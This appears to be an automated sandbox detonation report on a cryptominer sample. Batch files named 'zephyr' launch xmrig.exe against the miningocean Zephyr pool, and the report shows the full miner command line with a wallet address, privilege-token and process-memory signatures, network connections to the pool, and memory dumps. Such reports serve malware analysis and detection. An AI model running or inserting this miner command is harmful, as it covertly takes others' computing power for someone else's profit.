Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3068 wrote to memory of 240 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
PID 3068 wrote to memory of 240 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (9).bat"

C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe

xmrig.exe -o us-zephyr.miningocean.org:5332 -u ZEPHYR2c1KpUmMcFb1DgEejg8bgrit4x9L8TUEk2e7B7gbtwtHDVyKCUZEzu4zQMnGjgZjJZES6wnefC6FgLJeyL6Ahz2SsWsoK1Y -p scall -a rx/0 -k

Network

Country Destination Domain Proto
US 8.8.8.8:53 us-zephyr.miningocean.org udp
US 15.204.240.197:5332 us-zephyr.miningocean.org tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp

Files

memory/240-0-0x0000026904CC0000-0x0000026904CE0000-memory.dmp

memory/240-1-0x0000026904D10000-0x0000026904D30000-memory.dmp

memory/240-2-0x0000026904D30000-0x0000026904D50000-memory.dmp

memory/240-3-0x0000026904D50000-0x0000026904D70000-memory.dmp

memory/240-4-0x0000026904D30000-0x0000026904D50000-memory.dmp

memory/240-5-0x0000026904D50000-0x0000026904D70000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-10-26 01:45

Reported

2024-10-26 02:32

Platform

win11-20241007-en

Max time kernel

90s

Max time network

204s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\PUB\WinRing0x64.sys

Signatures

N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\PUB\WinRing0x64.sys

C:\Users\Admin\AppData\Local\Temp\PUB\WinRing0x64.sys

C:\Users\Admin\AppData\Local\Temp\PUB\WinRing0x64.sys

Network

Files

memory/1572-0-0x0000000000010000-0x0000000000017000-memory.dmp

Analysis: behavioral5

Detonation Overview

Submitted

2024-10-26 01:45

Reported

2024-10-26 02:32

Platform

win10ltsc2021-20241023-en

Max time kernel

300s

Max time network

304s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (2).bat"

Signatures

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1196 wrote to memory of 3964 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
PID 1196 wrote to memory of 3964 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (2).bat"

C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe

xmrig.exe -o us-zephyr.miningocean.org:5332 -u ZEPHYR2c1KpUmMcFb1DgEejg8bgrit4x9L8TUEk2e7B7gbtwtHDVyKCUZEzu4zQMnGjgZjJZES6wnefC6FgLJeyL6Ahz2SsWsoK1Y -p scall -a rx/0 -k

Network

Country Destination Domain Proto
US 8.8.8.8:53 us-zephyr.miningocean.org udp
US 15.204.244.104:5332 us-zephyr.miningocean.org tcp
US 8.8.8.8:53 136.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 104.244.204.15.in-addr.arpa udp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 79.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 28.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 fd.api.iris.microsoft.com udp
N/A 20.103.156.88:443 tcp

Files

memory/3964-0-0x0000021282700000-0x0000021282720000-memory.dmp

memory/3964-1-0x0000021282740000-0x0000021282760000-memory.dmp

memory/3964-3-0x0000021282780000-0x00000212827A0000-memory.dmp

memory/3964-2-0x0000021282760000-0x0000021282780000-memory.dmp

memory/3964-5-0x0000021282780000-0x00000212827A0000-memory.dmp

memory/3964-4-0x0000021282760000-0x0000021282780000-memory.dmp

Analysis: behavioral8

Detonation Overview

Submitted

2024-10-26 01:45

Reported

2024-10-26 02:32

Platform

win11-20241007-en

Max time kernel

214s

Max time network

282s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (3).bat"

Signatures

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3492 wrote to memory of 4376 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
PID 3492 wrote to memory of 4376 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (3).bat"

C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe

xmrig.exe -o us-zephyr.miningocean.org:5332 -u ZEPHYR2c1KpUmMcFb1DgEejg8bgrit4x9L8TUEk2e7B7gbtwtHDVyKCUZEzu4zQMnGjgZjJZES6wnefC6FgLJeyL6Ahz2SsWsoK1Y -p scall -a rx/0 -k

Network

Country Destination Domain Proto
US 8.8.8.8:53 us-zephyr.miningocean.org udp
US 15.204.240.197:5332 us-zephyr.miningocean.org tcp

Files

memory/4376-0-0x0000021A81BF0000-0x0000021A81C10000-memory.dmp

memory/4376-1-0x0000021B15660000-0x0000021B15680000-memory.dmp

memory/4376-2-0x0000021B15AB0000-0x0000021B15AD0000-memory.dmp

memory/4376-3-0x0000021B15CE0000-0x0000021B15D00000-memory.dmp

memory/4376-4-0x0000021B15AB0000-0x0000021B15AD0000-memory.dmp

memory/4376-5-0x0000021B15CE0000-0x0000021B15D00000-memory.dmp

Analysis: behavioral11

Detonation Overview

Submitted

2024-10-26 01:45

Reported

2024-10-26 02:32

Platform

win10ltsc2021-20241023-en

Max time kernel

300s

Max time network

258s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (5).bat"

Signatures

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1752 wrote to memory of 3048 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
PID 1752 wrote to memory of 3048 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (5).bat"

C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe

xmrig.exe -o us-zephyr.miningocean.org:5332 -u ZEPHYR2c1KpUmMcFb1DgEejg8bgrit4x9L8TUEk2e7B7gbtwtHDVyKCUZEzu4zQMnGjgZjJZES6wnefC6FgLJeyL6Ahz2SsWsoK1Y -p scall -a rx/0 -k

Network

Country Destination Domain Proto
US 8.8.8.8:53 us-zephyr.miningocean.org udp
US 8.8.8.8:53 73.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 15.204.240.197:5332 us-zephyr.miningocean.org tcp
US 8.8.8.8:53 197.240.204.15.in-addr.arpa udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 79.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 udp
N/A 20.74.47.205:443 tcp

Files

memory/3048-0-0x000001AA4A220000-0x000001AA4A240000-memory.dmp

memory/3048-1-0x000001AA4A270000-0x000001AA4A290000-memory.dmp

memory/3048-2-0x000001AA4A290000-0x000001AA4A2B0000-memory.dmp

memory/3048-3-0x000001AA4A2B0000-0x000001AA4A2D0000-memory.dmp

memory/3048-5-0x000001AA4A2B0000-0x000001AA4A2D0000-memory.dmp

memory/3048-4-0x000001AA4A290000-0x000001AA4A2B0000-memory.dmp

Analysis: behavioral13

Detonation Overview

Submitted

2024-10-26 01:45

Reported

2024-10-26 02:32

Platform

win10ltsc2021-20241023-en

Max time kernel

300s

Max time network

279s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (6).bat"

Signatures

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3488 wrote to memory of 4348 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
PID 3488 wrote to memory of 4348 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (6).bat"

C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe

xmrig.exe -o us-zephyr.miningocean.org:5332 -u ZEPHYR2c1KpUmMcFb1DgEejg8bgrit4x9L8TUEk2e7B7gbtwtHDVyKCUZEzu4zQMnGjgZjJZES6wnefC6FgLJeyL6Ahz2SsWsoK1Y -p scall -a rx/0 -k

Network

Country Destination Domain Proto
US 8.8.8.8:53 us-zephyr.miningocean.org udp
US 15.204.244.104:5332 us-zephyr.miningocean.org tcp
US 8.8.8.8:53 134.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 104.244.204.15.in-addr.arpa udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
US 8.8.8.8:53 28.173.189.20.in-addr.arpa udp

Files

memory/4348-0-0x0000020BAF2E0000-0x0000020BAF300000-memory.dmp

memory/4348-1-0x0000020BAF330000-0x0000020BAF350000-memory.dmp

memory/4348-3-0x0000020BAF350000-0x0000020BAF370000-memory.dmp

memory/4348-2-0x0000020BAF370000-0x0000020BAF390000-memory.dmp

memory/4348-5-0x0000020BAF350000-0x0000020BAF370000-memory.dmp

memory/4348-4-0x0000020BAF370000-0x0000020BAF390000-memory.dmp

Analysis: behavioral17

Detonation Overview

Submitted

2024-10-26 01:45

Reported

2024-10-26 02:32

Platform

win10ltsc2021-20241023-en

Max time kernel

300s

Max time network

308s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (8).bat"

Signatures

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4724 wrote to memory of 3412 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
PID 4724 wrote to memory of 3412 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (8).bat"

C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe

xmrig.exe -o us-zephyr.miningocean.org:5332 -u ZEPHYR2c1KpUmMcFb1DgEejg8bgrit4x9L8TUEk2e7B7gbtwtHDVyKCUZEzu4zQMnGjgZjJZES6wnefC6FgLJeyL6Ahz2SsWsoK1Y -p scall -a rx/0 -k

Network

Country Destination Domain Proto
US 8.8.8.8:53 us-zephyr.miningocean.org udp
US 15.204.244.104:5332 us-zephyr.miningocean.org tcp
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 0.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 104.244.204.15.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 79.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 fd.api.iris.microsoft.com udp

Files

memory/3412-0-0x00000224908E0000-0x0000022490900000-memory.dmp

memory/3412-1-0x0000022490A40000-0x0000022490A60000-memory.dmp

memory/3412-2-0x0000022490A60000-0x0000022490A80000-memory.dmp

memory/3412-3-0x0000022490A80000-0x0000022490AA0000-memory.dmp

memory/3412-4-0x0000022490A60000-0x0000022490A80000-memory.dmp

memory/3412-5-0x0000022490A80000-0x0000022490AA0000-memory.dmp

Analysis: behavioral18

Detonation Overview

Submitted

2024-10-26 01:45

Reported

2024-10-26 02:32

Platform

win11-20241007-en

Max time kernel

146s

Max time network

296s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (8).bat"

Signatures

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4172 wrote to memory of 2628 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
PID 4172 wrote to memory of 2628 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (8).bat"

C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe

xmrig.exe -o us-zephyr.miningocean.org:5332 -u ZEPHYR2c1KpUmMcFb1DgEejg8bgrit4x9L8TUEk2e7B7gbtwtHDVyKCUZEzu4zQMnGjgZjJZES6wnefC6FgLJeyL6Ahz2SsWsoK1Y -p scall -a rx/0 -k

Network

Country Destination Domain Proto
US 8.8.8.8:53 us-zephyr.miningocean.org udp
US 15.204.240.197:5332 us-zephyr.miningocean.org tcp
US 8.8.8.8:53 197.240.204.15.in-addr.arpa udp

Files

memory/2628-0-0x0000028407840000-0x0000028407860000-memory.dmp

memory/2628-1-0x0000028407890000-0x00000284078B0000-memory.dmp

memory/2628-2-0x00000284078B0000-0x00000284078D0000-memory.dmp

memory/2628-3-0x00000284078D0000-0x00000284078F0000-memory.dmp

memory/2628-4-0x00000284078B0000-0x00000284078D0000-memory.dmp

memory/2628-5-0x00000284078D0000-0x00000284078F0000-memory.dmp

Analysis: behavioral23

Detonation Overview

Submitted

2024-10-26 01:45

Reported

2024-10-26 02:32

Platform

win10ltsc2021-20241023-en

Max time kernel

300s

Max time network

250s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr.bat"

Signatures

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2332 wrote to memory of 2384 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
PID 2332 wrote to memory of 2384 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr.bat"

C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe

xmrig.exe -o us-zephyr.miningocean.org:5332 -u ZEPHYR2c1KpUmMcFb1DgEejg8bgrit4x9L8TUEk2e7B7gbtwtHDVyKCUZEzu4zQMnGjgZjJZES6wnefC6FgLJeyL6Ahz2SsWsoK1Y -p scall -a rx/0 -k

Network

Country Destination Domain Proto
US 8.8.8.8:53 us-zephyr.miningocean.org udp
US 15.204.244.104:5332 us-zephyr.miningocean.org tcp
US 8.8.8.8:53 67.31.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 104.244.204.15.in-addr.arpa udp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 198.187.3.20.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp

Files

memory/2384-0-0x0000023655280000-0x00000236552A0000-memory.dmp

memory/2384-1-0x00000236552D0000-0x00000236552F0000-memory.dmp

memory/2384-2-0x00000236552F0000-0x0000023655310000-memory.dmp

memory/2384-3-0x0000023655310000-0x0000023655330000-memory.dmp

memory/2384-4-0x00000236552F0000-0x0000023655310000-memory.dmp

memory/2384-5-0x0000023655310000-0x0000023655330000-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-10-26 01:45

Reported

2024-10-26 02:32

Platform

win10ltsc2021-20241023-en

Max time kernel

153s

Max time network

286s

Command Line

"C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 72.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 fd.api.iris.microsoft.com udp
NL 20.103.156.88:443 fd.api.iris.microsoft.com tcp
US 8.8.8.8:53 200.163.202.172.in-addr.arpa udp
US 8.8.8.8:53 172.214.232.199.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 77.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 67.112.168.52.in-addr.arpa udp

Files

memory/1016-0-0x000001DB6B8F0000-0x000001DB6B910000-memory.dmp

Analysis: behavioral9

Detonation Overview

Submitted

2024-10-26 01:45

Reported

2024-10-26 02:32

Platform

win10ltsc2021-20241023-en

Max time kernel

299s

Max time network

284s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (4).bat"

Signatures

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4588 wrote to memory of 4940 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
PID 4588 wrote to memory of 4940 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (4).bat"

C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe

xmrig.exe -o us-zephyr.miningocean.org:5332 -u ZEPHYR2c1KpUmMcFb1DgEejg8bgrit4x9L8TUEk2e7B7gbtwtHDVyKCUZEzu4zQMnGjgZjJZES6wnefC6FgLJeyL6Ahz2SsWsoK1Y -p scall -a rx/0 -k

Network

Country Destination Domain Proto
US 8.8.8.8:53 us-zephyr.miningocean.org udp
US 15.204.240.197:5332 us-zephyr.miningocean.org tcp
US 8.8.8.8:53 23.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 197.240.204.15.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
US 8.8.8.8:53 77.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 168.117.168.52.in-addr.arpa udp

Files

memory/4940-0-0x000001FD887B0000-0x000001FD887D0000-memory.dmp

memory/4940-1-0x000001FD887F0000-0x000001FD88810000-memory.dmp

memory/4940-3-0x000001FD88810000-0x000001FD88830000-memory.dmp

memory/4940-2-0x000001FD88830000-0x000001FD88850000-memory.dmp

memory/4940-4-0x000001FD88830000-0x000001FD88850000-memory.dmp

memory/4940-5-0x000001FD88810000-0x000001FD88830000-memory.dmp

Analysis: behavioral14

Detonation Overview

Submitted

2024-10-26 01:45

Reported

2024-10-26 02:32

Platform

win11-20241007-en

Max time kernel

91s

Max time network

278s

Command Line

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (6).bat"

Signatures

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2576 wrote to memory of 4108 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe
PID 2576 wrote to memory of 4108 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe

Processes

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\PUB\zephyr - Copie (6).bat"

C:\Users\Admin\AppData\Local\Temp\PUB\xmrig.exe

xmrig.exe -o us-zephyr.miningocean.org:5332 -u ZEPHYR2c1KpUmMcFb1DgEejg8bgrit4x9L8TUEk2e7B7gbtwtHDVyKCUZEzu4zQMnGjgZjJZES6wnefC6FgLJeyL6Ahz2SsWsoK1Y -p scall -a rx/0 -k

Network

Country Destination Domain Proto
US 8.8.8.8:53 us-zephyr.miningocean.org udp
US 15.204.244.104:5332 us-zephyr.miningocean.org tcp

Files

memory/4108-0-0x0000020363320000-0x0000020363340000-memory.dmp

memory/4108-1-0x0000020364C10000-0x0000020364C30000-memory.dmp

memory/4108-2-0x0000020364D50000-0x0000020364D70000-memory.dmp

memory/4108-3-0x0000020364D70000-0x0000020364D90000-memory.dmp

memory/4108-4-0x0000020364D50000-0x0000020364D70000-memory.dmp

memory/4108-5-0x0000020364D70000-0x0000020364D90000-memory.dmp